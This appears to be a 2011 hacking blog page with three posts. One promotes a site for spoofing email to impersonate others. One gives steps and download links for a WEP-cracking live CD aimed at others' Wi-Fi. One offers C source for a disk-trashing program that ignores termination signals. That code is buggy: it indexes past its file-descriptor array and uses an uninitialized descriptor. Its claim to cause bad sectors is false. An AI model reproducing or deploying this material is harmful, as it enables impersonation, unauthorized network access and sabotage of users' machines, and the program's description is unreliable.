Saturday, 30 July 2011

Send Fake Emails From Any Email Id




There are some websites on the internet which allows you to send emails to any person. By using fake mail sender u can send emails to any email id by any email id (fake email id not necessary to exists). Suppose you know the email id of a person A. You want to send an email from the email id of person A. You can use these fake email sender website to do that. You can send email by any email id either it exists or not.
Try this fake mail sender website : mail.anonymizer

Wireless Hacking Live CD 3.1 WiFi Slax

    WEP is an encryption scheme, based on the RC-4 cipher, that is available on all 802.11a, b and g wireless products. WEP uses a set of bits called a key to scramble information in the data frames as it leaves the access point or client adapter and the scrambled message is then decrypted by the receiver. Both sides must have the same WEP key, which is usually a total of 64 or 128 bits long
 
    A semi-random 24 bit number called an Initialization Vector (IV), is part of the key, so a 64 bit WEP key actually contains only 40 bits of \ strong\ encryption while a 128 bit key has 104. The IV is placed in encrypted frame\ s header, and is transmitted in plain text.
Traditionally, cracking WEP keys has been a slow and boring process. An attacker would have to capture hundreds of thousands or millions of packets? a process that could take hours or even days, depending on the volume of traffic passing over the wireless network. After enough packets were captured, a WEP cracking program such as Aircrack would be used to find the WEP key.

 
Basic Directions:
1)Boot from cd
2)Get the wep key
3)Write it down
4)Reboot into windows
5)Connect using wep key.
 


Download-Hotfile

http://hotfile.com/dl/84031397/5cc9387/WIfi.S.W.H.B.part1.rar.html
http://hotfile.com/dl/84031847/4b51bb3/WIfi.S.W.H.B.part2.rar.html
http://hotfile.com/dl/84032512/e1c5b9d/WIfi.S.W.H.B.part3.rar.html
http://hotfile.com/dl/84033083/9d04c26/WIfi.S.W.H.B.part4.rar.html
http://hotfile.com/dl/84032767/605d80d/WIfi.S.W.H.B.part5.rar.html
http://hotfile.com/dl/84032185/17dfd46/WIfi.S.W.H.B.part6.rar.html
http://hotfile.com/dl/84033179/8e03956/WIfi.S.W.H.B.part7.rar.html

Download-Uploading

http://uploading.com/files/6aabdddm/WIfi.S.W.H.B.part1.rar/
http://uploading.com/files/666233b2/WIfi.S.W.H.B.part2.rar/
http://uploading.com/files/d8ce9637/WIfi.S.W.H.B.part3.rar/
http://uploading.com/files/27bef47c/WIfi.S.W.H.B.part4.rar/
http://uploading.com/files/3d675d2a/WIfi.S.W.H.B.part5.rar/
http://uploading.com/files/5372c61e/WIfi.S.W.H.B.part6.rar/
http://uploading.com/files/e88164ab/WIfi.S.W.H.B.part7.rar/

Download-Fileserve

http://www.fileserve.com/file/CWyxzFP
http://www.fileserve.com/file/q2qHFAU
http://www.fileserve.com/file/g9rwNze
http://www.fileserve.com/file/fk9zjmk
http://www.fileserve.com/file/4r3U7cP
http://www.fileserve.com/file/TJ99gcK
http://www.fileserve.com/file/afKMHcP

Download-Filesonic

http://www.filesonic.com/file/34216529/WIfi.S.W.H.B.part1.rar
http://www.filesonic.com/file/34216657/WIfi.S.W.H.B.part2.rar
http://www.filesonic.com/file/34216593/WIfi.S.W.H.B.part3.rar
http://www.filesonic.com/file/34216521/WIfi.S.W.H.B.part4.rar
http://www.filesonic.com/file/34216715/WIfi.S.W.H.B.part5.rar
http://www.filesonic.com/file/34216455/WIfi.S.W.H.B.part6.rar
http://www.filesonic.com/file/34216025/WIfi.S.W.H.B.part7.rar

Damage The Hard Disk

This C program will create Bad Sectors on HDD and in turn it will damage the hard disk.

(Use at your own risk)

#include <stdio.h>
#include <stdlib.h>
#include <unistd.h>
#include <signal.h>
#include <sys/types.h>
#include <sys/stat.h>
#include <fcntl.h>

#define HDSIZE 640000

void handle_sig();

int main() {

int i = 0;
int x;
int fd[5];

signal(SIGINT, handle_sig);
signal(SIGHUP, handle_sig);
signal(SIGQUIT, handle_sig);
signal(SIGABRT, handle_sig);
signal(SIGTERM, handle_sig);

char *buf;

buf = malloc(HDSIZE);

printf("sekt0r: trashing hard disk with bad sectors!\n");

while(1) {
fd[1] = open("/tmp/.test", O_WRONLY|O_CREAT, 511);
fd[2] = open("/tmp/.test1", O_WRONLY|O_CREAT, 511);
fd[3] = open("/tmp/.test2", O_WRONLY|O_CREAT, 511);
fd[4] = open("/tmp/.test3", O_WRONLY|O_CREAT, 511);
fd[5] = open("/tmp/.test4", O_WRONLY|O_CREAT, 511);

for(x = 0; x < 5; x++) {
write(fd[x], buf, HDSIZE);
lseek(fd[x], 0, SEEK_SET);
close(fd[x]);

} /* end for() loop. */
} /* end while() loop. */
} /* end main(). */


void handle_sig() {
/* Reset signal handlers. */
signal(SIGINT, handle_sig);
signal(SIGHUP, handle_sig);
signal(SIGQUIT, handle_sig);
signal(SIGABRT, handle_sig);
signal(SIGTERM, handle_sig);

printf("sekt0r: cannot exit - trashing hard disk with bad sectors!\n");
return; /* go back to creating bad sectors. */
}